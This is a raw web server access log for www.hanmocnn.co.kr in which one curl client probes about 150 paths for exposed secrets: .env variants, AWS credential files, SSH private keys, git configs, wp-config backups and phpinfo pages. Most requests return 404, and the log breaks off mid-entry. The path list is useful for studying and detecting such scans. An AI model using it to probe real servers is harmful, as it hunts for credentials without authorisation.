- GET https www.hanmocnn.co.kr "/cms/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/portal/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dashboard/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/crm/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/mail/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/mailer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/deployment/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/helm/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/terraform/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ansible/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/mail.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/smtp.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/database.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_example" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:39 +0000] - 301 301 - GET https www.hanmocnn.co.kr "/api" [Client 185.177.72.38] [Length 169] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:40 +0000] - - 301 - GET http www.hanmocnn.co.kr "/api/" [Client 185.177.72.38] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/local/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/application/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_profiler/phpinfo" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/settings.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/new/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/new/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/new/.env.production" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/new/.env.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_profiler/phpinfo/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_profiler/phpinfo/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws-secret.yaml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/awstats/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/conf/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cron/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/www/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.backup" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/xampp/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/lara/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/lara/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/js/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/core/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/nginx/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/site/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/xampp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.docker/laravel/app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/.env.production" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/.env.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/core/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/core/.env.production" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/core/.env.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/main/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bootstrap/cache/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/app/private/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/logs/laravel.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/composer.lock" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dump.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php5.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/app.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server-info" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.php.save" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pi.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php.backup" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws-credentials.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/info" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/%c0" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/credentials.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/credentials/admin/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.azure-pipelines.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.bitbucket-pipelines.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.bitbucket/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.boto" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.bzr/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.c9/metadata/environment/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.circleci/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.circleci/config.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.dockerignore" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env-db" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.back" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.bkp" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.credentials" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.email" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.hidden" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.hide" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.mail" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.smtp" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.swp" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.testing" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.uat" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_aws" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_backup" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_copy" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_private" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_secret" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env~" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/*.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/.gitignore" [Client 185.177.72.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitlab-ci.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitlab-ci/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitlab/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.hg/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.htaccess" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.idea/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.next/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.npmrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.nuxt/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.output/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.phpinfo" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.production" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.pypirc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.remote" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.ssh/id_rsa" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.ssh/id_rsa.pub" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.svn/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.travis.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.vite/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.vscode/settings.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] 